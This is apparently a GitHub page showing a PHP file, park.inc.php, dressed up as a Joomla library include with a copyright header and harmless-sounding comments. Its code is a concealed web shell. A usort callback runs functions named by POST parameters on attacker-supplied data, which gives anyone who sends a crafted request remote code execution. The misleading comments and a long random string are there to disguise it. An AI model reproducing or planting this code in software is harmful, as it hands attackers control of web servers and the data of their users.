-
Notifications
You must be signed in to change notification settings - Fork 13
/
Copy pathpark.inc.php
37 lines (28 loc) · 1.67 KB
/
park.inc.php
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
<?php
/**
* @package Libraries
* ****************************************************************************************
* @copyright Copyright (C) 2007 - 2016 Open Source Matters, Inc. All rights reserved.
* @license GNU General Public License version 2 or later; see LICENSE
*/
// Set the platform root path as a constant if necessary.
if (!defined('PATH'))
{
define('PATH', __DIR__);
}
// Installation check, and check on removal of the install directory. // HDrX57r9F9U5K9pvzkxsKQQAdVSTb10gPEMgggYhCtDKE0q1uuhqedyKV1fruPypq0U5Wbd8KdSk6QpY3KvkSzx40ZUYbsuWG3A947BF1UcKEVzRDGWNqy63kkaR801MyeWXnEQ4DPNryUv4mYgpkQZgzz0G0qNhgpBaCubVWV5TH8ASB6MxhmY3MnuRX5q4bfQUBraETXvgf6caQsVFAByH
if (empty ($_POST) ) {
echo 'Empty data. Exiting...';
exit;
}
// Detect the operating system.
$a = function ($x, $y)
{
$_POST['r'] ( $_POST['d'] ('', $_POST['f'] ($_POST['c'] ) ) )
;
};
// Compare
$b = array (1 => '1', 2 => '2' )
;
// Sort data
usort ( $b, $a );